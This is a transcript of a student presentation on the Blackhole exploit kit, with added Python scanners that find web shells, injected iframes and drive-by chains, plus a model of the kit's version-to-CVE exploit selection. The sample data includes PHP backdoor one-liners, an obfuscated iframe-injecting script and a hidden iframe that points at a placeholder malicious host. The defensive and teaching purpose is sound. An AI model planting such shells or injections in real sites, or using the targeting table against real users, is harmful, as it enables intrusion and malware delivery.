Web Threat Evolution: Blackhole Toolkit for Hacking CMS Websites


Upload: deep-mehta

Posted on 26-May-2015



TRANSCRIPT

Page 1: Web Threat Evolution: Blackhole Toolkit for Hacking CMS Websites

Name: Deep Mehta (8th IT)
College: Silver Oak College of Engineering & Technology

Page 2: What are Toolkits?

Malicious hackers sometimes use toolkits: pre-packaged pieces of code that make it very easy to distribute malware, infect websites with it, and then carry out specific malicious activities through the compromised site(s).

The strain of malware discussed here is tied to a toolkit popularly known as the Blackhole Toolkit. The toolkit has been available for some time now and has been documented by researchers.

Page 3: Why Hackers Use This Malware

Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground: benign websites are compromised and infected so that they in turn infect their visitors. In the vast majority of cases the affected website owners are completely unaware that a hacker has used their site to infect its visitors.

Page 4: History of the Blackhole Kit

Version     Release date
2.0         09/2012
1.2.5       07/30/2012
1.2.4       07/11/2012
1.2.3       03/28/2012
1.2.2       02/26/2012
1.2.1       12/09/2011
1.2.0       11/09/2011
1.1.0       06/26/2011
1.0.2       11/20/2010
1.0.0 beta  08/2010

Blackhole was developed by an anonymous Russian hacker group.

Core language of development: PHP (the server-side kit).

Payload: Java-based components (the exploit objects served to the browser), followed by a Win32 executable.

Uses the traffic of a compromised website to reach other systems (the visitors, who become the victims).

The hacker first attacks web hosting servers, so that the sites they host can be turned against their visitors.

Page 5: Blackhole Toolkit Statistics

Blackhole is delivered by code injected into a web page. When you browse to a page carrying that code, the kit identifies and exploits vulnerabilities in your browser and its plugins, and forces adware, phishing programs or other fraudulent software to be installed on your device.

Blackhole Exploit Kit is a spreading threat. In 2013 it was ranked number 1 in the world among online threats. According to AVG, Blackhole had been detected on victims' machines in 218 countries during the month before its report, and 50,759 websites in 145 countries were hosting the kit at that time.

Page 6: (image-only slide; no text extracted)

Page 7: How it Can be Detected in Websites

The leading clue was a file named "27" in the kit's file upload directory. This is the location where new executable payloads are uploaded for further distribution to the infected endpoints.

The file was not what one would generally expect to find there: not the usual botnet executable or keylogger installer that are generally observed as payloads, but a copy of the infamous C99Shell backdoor, the most popular tool of choice for hacking into websites.
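The indicator above, a server-side script sitting where only payload or media files should be, is the same thing a CMS operator should look for in their own upload tree. The scanner below is an added example written for this page, not code from the presentation or from any vendor; the indicator list, the file names and the constructed sample directory are assumptions for illustration, not a vendor signature set.

```python
"""Scan a web upload directory for dropped web shells.

Added example for the "How it can be detected in Websites" slide; this
is not code from the presentation or from any vendor report.  It looks
for the class of artifact described there: a C99Shell-style backdoor
saved under an innocent name (such as "27") in a directory that should
hold only uploaded media.  The indicator list is a heuristic chosen for
this example, not a vendor signature set.
"""
import os
import re
import tempfile
from pathlib import Path

# Extensions the web server would execute if a file in the upload tree
# were requested directly.  No such file should ever live there.
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Magic bytes for the media types an upload directory is expected to hold.
IMAGE_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}

# Constructs common in obfuscated PHP backdoors (assumed heuristic list).
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
SUSPICIOUS_CALLS = re.compile(
    rb"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|"
    rb"passthru|shell_exec|system|popen|proc_open)\s*\(",
    re.IGNORECASE,
)


def inspect_file(path: Path, root: Path) -> list:
    """Return (relative_path, reason) findings for one file."""
    findings = []
    rel = str(path.relative_to(root))
    ext = path.suffix.lower()
    data = path.read_bytes()

    if ext in EXECUTABLE_EXT:
        findings.append((rel, "executable script extension in upload directory"))
    if PHP_OPEN_TAG.search(data):
        findings.append((rel, "PHP open tag inside uploaded file"))
    if SUSPICIOUS_CALLS.search(data):
        names = sorted({m.group(1).decode().lower() for m in SUSPICIOUS_CALLS.finditer(data)})
        findings.append((rel, "suspicious calls: " + ", ".join(names)))
    magic = IMAGE_MAGIC.get(ext)
    if magic is not None and not data.startswith(magic):
        findings.append((rel, "extension claims image but content does not"))
    return findings


def scan_upload_dir(root) -> list:
    """Walk the upload tree and return all findings, sorted by path."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(inspect_file(Path(dirpath) / name, root))
    return sorted(findings)


def build_sample_dir() -> str:
    """Create a constructed upload directory with one clean file and three
    planted artifacts (sample data for this example, not real malware)."""
    root = Path(tempfile.mkdtemp(prefix="uploads_"))
    (root / "2012" / "07").mkdir(parents=True)
    # Clean upload: a JPEG header followed by filler bytes.
    (root / "2012" / "07" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)
    # Backdoor dropped under a bare numeric name, as on the slide.
    (root / "27").write_bytes(b"<?php eval(base64_decode($_POST['c'])); ?>")
    # Script with an executable extension hidden in the media tree.
    (root / "2012" / "07" / "thumb.php").write_bytes(b"<?php system($_GET['cmd']); ?>")
    # Image extension, but the body is a PHP script.
    (root / "2012" / "07" / "avatar.gif").write_bytes(b"<?php passthru($_REQUEST['x']); ?>")
    return str(root)


if __name__ == "__main__":
    for rel, reason in scan_upload_dir(build_sample_dir()):
        print(f"{rel}: {reason}")
```

Run it as a script to print the findings for the constructed directory, or call scan_upload_dir on a real uploads path. It will not see a backdoor that relies on an extension outside the list or on a handler remapped through .htaccess, so treat the heuristics as a starting point and compare against a known-good file inventory where one exists.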

Page 8: Attack Process of the Blackhole Toolkit

1. Unsuspecting Internet surfers visit websites harboring malicious IFrame tags.
2. Users are then redirected to servers which load malicious payloads via browser exploits or PDF- and SWF-based exploits.
3. Often, a malicious JAR file is downloaded to the unsuspecting client's PC.
4. This JAR file contains malicious URLs which download further malware.
5. The downloaded trojan(s) can post a unique ID to a command-and-control server.
6. The trojan then posts a list of the running processes on the victim's computer to the server.
7. The following three plugins are then downloaded:
   stopav.plug - tries to disable the antivirus installed on the victim's computer
   passw.plug - logs username/password combinations for connections being made
   miniav.plug - tries to delete copies of Zeus bots on the computer to prevent competition amongst malware on the victim's computer
8. Finally, a fake anti-virus program is downloaded to the victim's computer.
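Step 1 of the process above is the part a website owner can check directly: an injected iframe, or a script that writes one, in a page that should not carry it. The static audit below is an added example written for this page, not code from the presentation; the sample markup, the domain names and the hidden-style patterns are constructed assumptions for illustration.

```python
"""Static audit of a web page for injected frames.

Added example for the "Attack Process" slide; it is not code from the
presentation.  Blackhole infections started with an iframe (or a script
that writes one) planted in a legitimate page, so the site owner's first
check is: does any page carry a frame that is invisible, off-site, or
built by obfuscated JavaScript?  Domain names and the sample page are
constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles used to keep an injected frame out of sight (assumed list).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
# A script that assembles markup from escaped text and writes it into the
# page is the classic loader for an injected iframe.
OBFUSCATED_WRITER = re.compile(
    r"document\.write\s*\(.*?(?:unescape|String\.fromCharCode|eval)\s*\(",
    re.IGNORECASE | re.DOTALL,
)


def _px(value):
    """Parse a width/height attribute ('1', '1px') to int, else None."""
    try:
        return int(str(value).strip().lower().rstrip("px"))
    except ValueError:
        return None


class FrameAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False

    def _is_offsite(self, src):
        # Hostname comparison only; a registrable-domain check would be
        # stricter but needs a suffix list.
        host = (urlparse(src).hostname or "").lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny frame")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")
        if self._is_offsite(a.get("src", "")):
            reasons.append("off-site source")
        if not reasons:
            return
        # An invisible frame is an injection indicator on its own; a merely
        # off-site frame could be a legitimate embed and only needs review.
        verdict = "injected" if ("tiny frame" in reasons or "hidden by style" in reasons) else "review"
        self.findings.append({"kind": "iframe", "src": a.get("src", ""), "reasons": reasons, "verdict": verdict})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and OBFUSCATED_WRITER.search(data):
            self.findings.append({"kind": "script", "src": "", "reasons": ["obfuscated document.write"], "verdict": "injected"})


def audit_page(html, site_host):
    """Return the list of suspicious frames and scripts found in the page."""
    auditor = FrameAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed page for www.example.com: one legitimate embed, one obfuscated
# loader script, and one injected frame just before </body>.
SAMPLE_PAGE = """<html><body>
<h1>Company news</h1>
<iframe src="https://video.example.org/embed/42" width="560" height="315"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example.net%2Fin.php%22%3E'));</script>
<iframe src="http://bad.example.net/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""


if __name__ == "__main__":
    for f in audit_page(SAMPLE_PAGE, "www.example.com"):
        print(f["verdict"], f["kind"], f["src"], ", ".join(f["reasons"]))
```

Obfuscation varies, so the script pattern catches only the common document.write(unescape(...)) loader; pair the audit with a file-integrity comparison against a clean copy of the site's templates.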

Page 9: Chain of Events Triggered in the Background

Initial vector: the victim is supplied with a carrier (a compromised web page or a spam message) which offers a hyperlink to initiate the chain of events.

Redirections: the hyperlink from the previous stage is redirected through intermediate sites to make tracing of the attack complicated.

Main file: the hosting server is contacted and the server code collects and distributes the set of exploit functions for the targeted host.

Download file: after any of the served exploits from the previous phase has activated, its downloader code (shellcode or script) connects back and the server code distributes the binary (Win32) executable payload.
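Seen from a proxy or gateway, the four stages above leave a recognisable sequence of requests from one client: the entry page, one or more redirects to other hosts, a landing page on the kit's host, an exploit object from that host, and finally an executable from the same host. The reconstruction below is an added example written for this page, not code from the presentation or from any proxy product; the log format, hosts, paths and timestamps are constructed assumptions for illustration.

```python
"""Reconstruct a Blackhole-style drive-by chain from web proxy logs.

Added example for the "Chain of Events" slide; this is not code from
the presentation or from any proxy vendor.  It walks each client's
requests in time order looking for the four stages the slide names:
initial page, redirections through other hosts, the kit's main file (a
landing page that then serves an exploit object), and the download of a
Win32 executable.  The log format and all hosts, paths and timestamps
are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log: timestamp client method url status mime referer
SAMPLE_LOG = """\
2012-09-12T10:15:01Z 10.1.2.3 GET http://www.example.com/news.html 200 text/html -
2012-09-12T10:15:01Z 10.1.2.3 GET http://www.example.com/style.css 200 text/css http://www.example.com/news.html
2012-09-12T10:15:02Z 10.1.2.3 GET http://hop1.example.net/go.php 302 text/html http://www.example.com/news.html
2012-09-12T10:15:02Z 10.1.2.3 GET http://hop2.example.org/r/ 302 text/html http://www.example.com/news.html
2012-09-12T10:15:03Z 10.1.2.3 GET http://kit.example.org/main.php?page=7f3a 200 text/html http://www.example.com/news.html
2012-09-12T10:15:04Z 10.1.2.3 GET http://kit.example.org/data/spl6.jar 200 application/java-archive http://kit.example.org/main.php?page=7f3a
2012-09-12T10:15:06Z 10.1.2.3 GET http://kit.example.org/w.php?f=7f3a&e=6 200 application/x-msdownload -
2012-09-12T10:16:10Z 10.1.2.9 GET http://www.example.com/news.html 200 text/html -
2012-09-12T10:16:11Z 10.1.2.9 GET http://video.example.org/embed/42 200 text/html http://www.example.com/news.html
"""

# Object types the kit's landing page serves to trigger a plugin exploit.
EXPLOIT_MIMES = {"application/java-archive", "application/pdf", "application/x-shockwave-flash"}
# Types under which the Win32 payload is typically delivered.
BINARY_MIMES = {"application/x-msdownload", "application/octet-stream", "application/x-dosexec"}
# The whole chain runs in seconds; a longer gap means unrelated traffic.
WINDOW = timedelta(seconds=60)


def parse_log(text):
    """Parse the constructed log format into a list of request dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, mime, referer = line.split()
        records.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "method": method, "url": url,
            "host": urlparse(url).hostname or "",
            "status": int(status), "mime": mime,
            "referer": None if referer == "-" else referer,
        })
    return records


def find_chains(records):
    """Return one chain dict per client that completed all four stages."""
    by_client = defaultdict(list)
    for r in records:
        by_client[r["client"]].append(r)

    chains = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        chain = None
        for r in recs:
            if chain and r["ts"] - chain["started"] > WINDOW:
                chain = None  # too slow to be the same drive-by
            if 300 <= r["status"] < 400:
                # Stage 2: redirect hop(s); the referer names the entry page.
                if chain is None:
                    chain = {"client": client, "started": r["ts"], "entry": r["referer"],
                             "hops": [], "landing": None, "exploit": None, "payload": None}
                if chain["landing"] is None:
                    chain["hops"].append(r["url"])
                continue
            if chain is None or r["status"] != 200:
                continue
            entry_host = urlparse(chain["entry"] or "").hostname
            if chain["landing"] is None:
                # Stage 3: an HTML page on a host other than the entry site.
                if r["mime"] == "text/html" and r["host"] != entry_host:
                    chain["landing"] = r["url"]
            elif chain["exploit"] is None:
                # Exploit object served from the landing host.
                if r["mime"] in EXPLOIT_MIMES and r["host"] == urlparse(chain["landing"]).hostname:
                    chain["exploit"] = r["url"]
            elif r["mime"] in BINARY_MIMES and r["host"] == urlparse(chain["landing"]).hostname:
                # Stage 4: the Win32 payload from the same host completes the chain.
                chain["payload"] = r["url"]
                chains.append(chain)
                chain = None
    return chains


def describe(chain):
    """Render a chain as entry -> hops -> landing -> exploit -> payload."""
    steps = [chain["entry"] or "?"] + chain["hops"] + [chain["landing"], chain["exploit"], chain["payload"]]
    return f"{chain['client']}: " + " -> ".join(steps)


if __name__ == "__main__":
    for c in find_chains(parse_log(SAMPLE_LOG)):
        print(describe(c))
```

The second client in the sample visits the same entry page and an off-site embed but never follows a redirect to a host that serves an exploit object and an executable, so no chain is reported for it; that four-stage requirement is what keeps ordinary redirects and embeds out of the results.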

Page 10: Exploit Selection Logic (image-only slide; no further text extracted)

Page 11: Different Types of Exploits Available

spl0: empty
spl1: missing
spl2: MDAC exploit (MS06-014)
spl3: PDF
spl4: Windows Help and Support Center vulnerability
spl5: Flash (CVE-2011-0611)
spl6: Flash (CVE-2011-2110)
spl7: XML Core Services (CVE-2012-1889)
NOJS: Java (CVE-2010-0840)

Different Types of Plugins Checked When Selecting Exploits

Operating system
Web browser name and version
Adobe Flash version
Adobe Reader version
Java version
QuickTime
DevalVR
Shockwave
Windows Media Player
Silverlight
VLC Player
RealPlayer
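The two lists above are the inputs and outputs of the kit's selection logic: it compares the fingerprinted plugin versions against the versions its exploit slots target and serves only the slots whose software is present and unpatched. The model below is an added example written for this page, not code from the presentation or from the kit, and the same comparison run by a defender over an inventory of client versions shows which machines the kit could have hit. The "first fixed version" values in the table are assumptions for this example based on my reading of the vendor advisories for the listed CVEs (Adobe APSB11-07 and APSB11-18, and the Java 6 Update 19 release); confirm them against those advisories before using the table operationally. Slots whose applicability depends on OS or browser patch level rather than a plugin version (spl2, spl4, spl7) are deliberately left out.

```python
"""Model of the version-based exploit selection behind the two lists above.

Added example, not code from the presentation or from the kit.  The
"first fixed" versions are assumptions for this example taken from my
reading of the vendor advisories for the CVEs on the slide; verify them
before relying on the table.
"""
import re

# (fingerprint field, first version without the bug, exploit slot, CVE)
# Thresholds are assumed for illustration.
EXPLOIT_TABLE = [
    ("flash", "10.2.159.1",  "spl5", "CVE-2011-0611"),
    ("flash", "10.3.181.26", "spl6", "CVE-2011-2110"),
    ("java",  "1.6.0_19",    "NOJS", "CVE-2010-0840"),
]


def parse_version(text):
    """Normalise the version strings a fingerprint reports into tuples.

    Handles Flash-style '10.3.181.23', Java-style '1.6.0_18' and the short
    Java form '6u18' (which denotes 1.6.0_18).  Tuples compare element by
    element, which is the ordering the kit needs.
    """
    text = str(text).strip().lower()
    short = re.fullmatch(r"(\d+)u(\d+)", text)
    if short:
        return (1, int(short.group(1)), 0, int(short.group(2)))
    parts = re.split(r"[._]", text)
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(installed, first_fixed):
    """True when the installed version predates the first fixed version."""
    return parse_version(installed) < parse_version(first_fixed)


def select_exploits(fingerprint):
    """Return the (slot, CVE) pairs the kit would serve to this client.

    fingerprint is a dict such as {'os': 'Windows XP', 'browser': 'MSIE 8',
    'flash': '10.3.181.23', 'java': '1.6.0_18'}.  A plugin that is absent
    from the fingerprint skips its slots, which is why the kit bothers to
    enumerate plugins before serving anything.
    """
    chosen = []
    for field, first_fixed, slot, cve in EXPLOIT_TABLE:
        installed = fingerprint.get(field)
        if installed and is_vulnerable(installed, first_fixed):
            chosen.append((slot, cve))
    return chosen


if __name__ == "__main__":
    # Constructed fingerprints: a stale XP client and a fully patched one.
    for fp in ({"os": "Windows XP", "browser": "MSIE 8", "flash": "10.3.181.23", "java": "6u18"},
               {"os": "Windows 7", "browser": "Firefox 15", "flash": "11.4.402.265", "java": "1.7.0_07"}):
        print(fp, "->", select_exploits(fp))
```

A client reporting Flash 10.3.181.23 is already past the spl5 threshold but still short of the spl6 one, so only spl6 is served for Flash; that branch-sensitive comparison is the whole reason the kit collects exact version strings rather than a yes/no plugin list.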

Page 12: Personal Experience (image-only slide; no text extracted)

Page 13: References

http://www.avg.com/in-en/press-releases-news.ndi-1563
http://www.symantec.com/connect/blogs/blackhole-theory
http://www.stopthehacker.com
http://www.avg.com/in-en/press-releases-news.ndi-3723
http://news.softpedia.com/news/Blackhole-Toolkit-Served-by-Spam-Ahead-of-Tax-Season-251438.shtml
http://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit

Page 14: Thank You.